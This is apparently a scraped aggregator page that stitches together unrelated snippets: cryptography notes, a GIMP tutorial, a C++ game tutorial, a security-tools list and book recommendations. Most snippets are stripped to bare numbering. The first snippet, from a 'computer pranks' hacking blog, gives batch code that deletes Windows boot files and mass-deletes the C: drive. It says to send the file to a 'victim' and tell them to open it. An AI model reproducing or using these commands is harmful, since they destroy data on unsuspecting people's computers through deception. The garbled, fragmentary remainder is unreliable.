background preloader

Encryption

Encryption

Painfully Computer Pranks ~ Computer Hacking | Learn How To Hack Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. 1. I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q Paste it in NotePad And Save It with Extension .cmd or .bat 3. 1. @echo off:topmd %random%goto top 2. 3. 4. 5. 4. 1. 2. 3. 5. 1. 2. 3.

An Overview of Cryptography As an aside, the AES selection process managed by NIST was very public. A similar project, the New European Schemes for Signatures, Integrity and Encryption (NESSIE), was designed as an independent project meant to augment the work of NIST by putting out an open call for new cryptographic primitives. NESSIE ran from about 2000-2003. While several new algorithms were found during the NESSIE process, no new stream cipher survived cryptanalysis. As a result, the ECRYPT Stream Cipher Project (eSTREAM) was created, which has approved a number of new stream ciphers for both software and hardware implementation. CAST-128/256: CAST-128, described in Request for Comments (RFC) 2144, is a DES-like substitution-permutation crypto algorithm, employing a 128-bit key operating on a 64-bit block. A digression: Who invented PKC? 3.3. Let me reiterate that hashes are one-way encryption. A digression on hash collisions.

Removing an object on a photo with GIMP Tutorial to remove objects (or people) and restore the portion of the background they hide in a photo with the Resynthesizer plugin. An impressive video has been posted on Youtube to show how, with Photoshop, it is possible to delete objects in an image automatically, without any design work. The same can be done with The Gimp in fact and for longer (it is not impossible that the same algorithm has been reused). This plugin "re-synthesizes" the background" and rebuilds it from same elements on the photo. It can thus reconstruct the sky, lawn, or even more complex views, from a sample taken from the image. First, see the Resynthesizer tutorial to know the purpose of controls. We will put in practice the commands using the same pictures that the Photoshop demonstration video. Using Resynthesizer in Script-Fu 1. 2. We want to remove the tree on the top left. 3. This windows is opened. 4.Here is the final image Using the Map -> Resynthesize filter 1. 2. 3. 4. This window is opened: 5. More

The 43 Things Administrators Should Never Do Administrators have a tough job on their hands to manage, maintain and protect the network they are responsible for. Armed with the latest tools, they do an excellent job; however, at times, often due to pressure, they make mistakes – sometimes easily avoidable. In this post we are going to present the top 43 common mistakes administrators have made, as a reminder of what they shouldn’t do. They are categorized under networking, configuration, security, and best practices, and are based on firsthand experiences. Here is the list: Networking 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. Configuration 11. 12. 13. 14. 15. 16. 17. 18. Security 19. 20. 21. 22. 23. 24. 25. 26. Best practices 27. 28. 29. 30. 31. 32. 33. 34. 35. 36. 37. 38. 39. 40. 41. 42. 43. If you can avoid doing the 43 things in this list, you will save yourself, and others, time and money, avoid headaches, and minimize downtime. Learned any lessons the hard way yourself?

Labs PHP Security Guide Game From Scratch C++ Edition! Want to create a game using C++ and SFML? This is the perfect place to start! This tutorial series will follow the creation of a simple game in C++ from the very beginning till the end, a micro-version of the overall purpose of this site. This series is meant to be a living document, so if you have any questions on specific section, let me know and I will update accordingly! Finally, I don’t pretend to be an expert on C++ nor SFML, so if you see a mistake or you disagree with something I have said, let me know. Alright, lets get this started. EDIT: This tutorial was written a couple years ago and targets Visual Studio 2010. The Introduction In this section we have an overview of what this project is going to involve as well as a list of programs and libraries you are going to need to follow along. Part 1 In this section we set up and configure your Visual C++ project and configure Visual C++ to work properly with SFML. Part 2 Code, we finally start to code. Part 3 Part 4 Part 5 Part 6 Part 7

Top 15 Open Source/Free Security/Hacking Tools | Security & Hacking Blog 1. Nmap Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap homepage. 2. Wireshark is a network protocol analyzer. 3. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. 4. Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. 5. 6. ettercap 7. 8. 9. 10. w3af 11. hping 12. burpsuite 13.

6 Books Every Programmer Should Own I’ve seen many lists about the best programming books and I am sure there are a lot of books that are specific to a programming knowledge or technology – that I have not included in my list. The books I have chosen are those that are meant to inspire, increase productivity and improve your programming design skills. Note: This list has no particular order. Code Complete 2 Steve McConnell The main focus of this book to help you improve your programming design skills. The Pragmatic Programmer: From Journeyman to Master Andrew Hunt and David Thomas This book focuses on the best practices of programming (i.e. what you should and should not do). Pragmatic Thinking and Learning: Refactor Your Wetware Andy Hunt From the author of The Pragmatic Programmer, this book takes one-step back from programming and focuses on your everyday thinking and problem solving skills. The Productive Programmer Neal Ford and David Bock Algorithms in a Nutshell George T Heineman, Gary Pollice and Stanley Selkow Thomas H.

Related: